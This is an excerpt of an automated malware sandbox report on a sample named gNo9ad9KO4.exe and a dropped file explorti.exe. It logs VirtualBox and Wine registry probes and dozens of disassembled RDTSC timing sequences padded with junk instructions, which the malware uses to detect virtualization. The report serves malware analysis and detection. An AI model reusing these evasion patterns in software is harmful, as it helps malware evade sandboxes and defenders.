Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 1CF6C0 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 clc 0x0000000a push dword ptr [ebp+122D02D1h] 0x00000010 jmp 00007F4688C929DEh 0x00000015 call dword ptr [ebp+122D34DBh] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1AD8h], ecx 0x00000022 xor eax, eax 0x00000024 cld 0x00000025 mov edx, dword ptr [esp+28h] 0x00000029 jmp 00007F4688C929E9h 0x0000002e mov dword ptr [ebp+122D3B28h], eax 0x00000034 add dword ptr [ebp+122D1AD8h], ebx 0x0000003a mov esi, 0000003Ch 0x0000003f mov dword ptr [ebp+122D1AD8h], esi 0x00000045 mov dword ptr [ebp+122D1AD8h], esi 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f clc 0x00000050 lodsw 0x00000052 clc 0x00000053 add eax, dword ptr [esp+24h] 0x00000057 or dword ptr [ebp+122D1AD8h], ebx 0x0000005d mov ebx, dword ptr [esp+24h] 0x00000061 jmp 00007F4688C929DCh 0x00000066 nop 0x00000067 pushad 0x00000068 push edx 0x00000069 jmp 00007F4688C929DAh 0x0000006e pop edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F4688C929E8h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D244 second address: 33D25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D25C second address: 33D285 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 jnc 00007F4688C929D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C929E5h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D285 second address: 33D29F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C1B766h 0x00000008 jmp 00007F4688C1B770h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D29F second address: 33D2B6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4688C929DAh 0x00000008 pushad 0x00000009 ja 00007F4688C929D6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33C07C second address: 33C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4688C1B766h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33C099 second address: 33C09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33C74D second address: 33C753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34013F second address: 340144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 340144 second address: 34015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34015E second address: 340185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4688C929DDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 340185 second address: 34018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34018B second address: 34018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34018F second address: 3401E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F4688C1B771h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007F4688C1B76Ch 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D33C2h], eax 0x0000001f stc 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+122D17A2h], edx 0x00000028 push 00000000h 0x0000002a mov dh, 0Bh 0x0000002c push 00000003h 0x0000002e mov dword ptr [ebp+122D17A2h], ecx 0x00000034 push 9465B82Bh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3401E0 second address: 3401EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4688C929D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403A2 second address: 3403AC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403AC second address: 3403B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403B1 second address: 3403B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403B7 second address: 3403F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F4688C929D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D3C04h] 0x0000002a push 00000000h 0x0000002c mov dh, 62h 0x0000002e push D0F05AC1h 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403F9 second address: 340480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 2F0FA5BFh 0x00000011 sub si, 5E7Ah 0x00000016 push 00000003h 0x00000018 add dword ptr [ebp+122D36A9h], edx 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 push ecx 0x00000022 mov dx, di 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 push 00000003h 0x00000029 push 59A1D9F2h 0x0000002e jmp 00007F4688C1B770h 0x00000033 add dword ptr [esp], 665E260Eh 0x0000003a mov edx, dword ptr [ebp+122D3AB8h] 0x00000040 lea ebx, dword ptr [ebp+1244502Ch] 0x00000046 push esi 0x00000047 jmp 00007F4688C1B772h 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 js 00007F4688C1B777h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361403 second address: 361409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361409 second address: 36140F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36140F second address: 361424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push esi 0x0000000d jne 00007F4688C929D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32A50D second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4688C1B76Ch 0x0000000e jnc 00007F4688C1B766h 0x00000014 jg 00007F4688C1B76Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32A52D second address: 32A543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F3FA second address: 35F3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F3FE second address: 35F40A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F56D second address: 35F57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F6D7 second address: 35F6DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F6DF second address: 35F6E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35FB1A second address: 35FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35FB1E second address: 35FB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35FB22 second address: 35FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3602E5 second address: 3602EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3602EC second address: 3602F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35737C second address: 3573B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 push esi 0x00000008 jmp 00007F4688C1B776h 0x0000000d jo 00007F4688C1B766h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 jnp 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605C1 second address: 3605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605C7 second address: 3605CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605CB second address: 3605CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605CF second address: 3605F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4688C1B779h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605F2 second address: 3605F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605F6 second address: 360616 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F4688C1B766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B772h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 360D8E second address: 360D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 360D92 second address: 360DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F4688C1B766h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32A529 second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36101E second address: 361028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361028 second address: 361030 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361030 second address: 361038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361038 second address: 36103C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3612BA second address: 3612C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3612C0 second address: 3612C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36384F second address: 363855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 363855 second address: 363898 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jo 00007F4688C929E4h 0x00000012 pushad 0x00000013 jnl 00007F4688C929D6h 0x00000019 jo 00007F4688C929D6h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F4688C929E4h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F4688C929D6h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36215D second address: 362161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3628A6 second address: 3628AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CDD second address: 364CE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CE3 second address: 364CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CE8 second address: 364CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CF1 second address: 364CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CF7 second address: 364CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36BFFC second address: 36C000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C000 second address: 36C004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C746 second address: 36C769 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4688C929E9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8CA second address: 36C8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4688C1B778h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8DA second address: 36C8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8EE second address: 36C8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8F4 second address: 36C916 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jnl 00007F4688C929D6h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F4688C929D6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DCD4 second address: 36DCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DCD8 second address: 36DCE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DF63 second address: 36DF67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DF67 second address: 36DF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E068 second address: 36E086 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B771h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E5C7 second address: 36E5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E80C second address: 36E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E9F9 second address: 36E9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F05E second address: 36F068 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F987 second address: 36F9A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F9A2 second address: 36F9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F9A8 second address: 36F9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F9AC second address: 36F9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F19 second address: 371F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4688C929E2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F31 second address: 371F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F56 second address: 371F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F60 second address: 371F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371D10 second address: 371D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371D16 second address: 371D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
